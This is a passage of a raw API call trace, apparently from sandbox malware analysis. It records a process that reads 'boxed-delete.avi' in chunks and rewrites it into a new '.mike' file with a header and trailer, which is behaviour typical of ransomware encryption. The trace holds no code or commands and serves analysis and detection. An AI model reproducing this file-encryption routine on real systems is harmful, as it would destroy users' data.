(in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.395] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.412] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.412] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.413] GetFileType (hFile=0x264) returned 0x1 [0044.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.413] GetFileType (hFile=0x264) returned 0x1 [0044.413] CloseHandle (hObject=0x264) returned 1 [0044.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.413] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.413] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x2149ac8 | out: lpFileInformation=0x2149ac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00)) returned 1 [0044.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x2149df4 | out: lpFileInformation=0x2149df4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00)) returned 1 [0044.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.414] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.414] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.415] GetFileType (hFile=0x264) returned 0x1 [0044.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.415] GetFileType (hFile=0x264) returned 0x1 [0044.415] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.415] WriteFile (in: hFile=0x264, lpBuffer=0x214acd4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x214acd4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.416] CloseHandle (hObject=0x264) returned 1 [0044.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.416] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x214a7b8 | out: lpFileInformation=0x214a7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00)) returned 1 [0044.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.416] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.416] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.417] GetFileType (hFile=0x264) returned 0x1 [0044.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.417] GetFileType (hFile=0x264) returned 0x1 [0044.417] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.417] ReadFile (in: hFile=0x264, lpBuffer=0x214be0c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214be0c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.419] CloseHandle (hObject=0x264) returned 1 [0044.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.420] GetFileType (hFile=0x264) returned 0x1 [0044.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.420] GetFileType (hFile=0x264) returned 0x1 [0044.420] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.420] WriteFile (in: hFile=0x264, lpBuffer=0x2156374*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2156374*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.421] CloseHandle (hObject=0x264) returned 1 [0044.421] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.422] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.422] GetFileType (hFile=0x264) returned 0x1 [0044.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.422] GetFileType (hFile=0x264) returned 0x1 [0044.422] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.422] ReadFile (in: hFile=0x264, lpBuffer=0x2158dec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2158dec*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.423] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.423] GetFileType (hFile=0x264) returned 0x1 [0044.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.423] GetFileType (hFile=0x264) returned 0x1 [0044.423] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.423] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.423] GetFileType (hFile=0x264) returned 0x1 [0044.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.424] GetFileType (hFile=0x264) returned 0x1 [0044.424] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.424] ReadFile (in: hFile=0x264, lpBuffer=0x2165dcc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2165dcc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.424] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.425] GetFileType (hFile=0x264) returned 0x1 [0044.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.425] GetFileType (hFile=0x264) returned 0x1 [0044.425] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.425] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.425] GetFileType (hFile=0x264) returned 0x1 [0044.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.425] GetFileType (hFile=0x264) returned 0x1 [0044.425] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.425] ReadFile (in: hFile=0x264, lpBuffer=0x2172dac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2172dac*, lpNumberOfBytesRead=0x2af080*=0x400, lpOverlapped=0x0) returned 1 [0044.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.426] GetFileType (hFile=0x264) returned 0x1 [0044.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.426] GetFileType (hFile=0x264) returned 0x1 [0044.426] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.426] WriteFile (in: hFile=0x264, lpBuffer=0x2176c60*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2176c60*, lpNumberOfBytesWritten=0x2af074*=0x400, lpOverlapped=0x0) returned 1 [0044.426] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.426] GetFileType (hFile=0x264) returned 0x1 [0044.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.427] GetFileType (hFile=0x264) returned 0x1 [0044.428] WriteFile (in: hFile=0x264, lpBuffer=0x2179e98*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2179e98*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.428] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ac2940, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ac2940, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ae8aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e20)) returned 1 [0044.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.428] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x217b608 | out: lpFileInformation=0x217b608*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ac2940, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ac2940, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ae8aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e20)) returned 1 [0044.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", dwFileAttributes=0x80) returned 0 [0044.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft 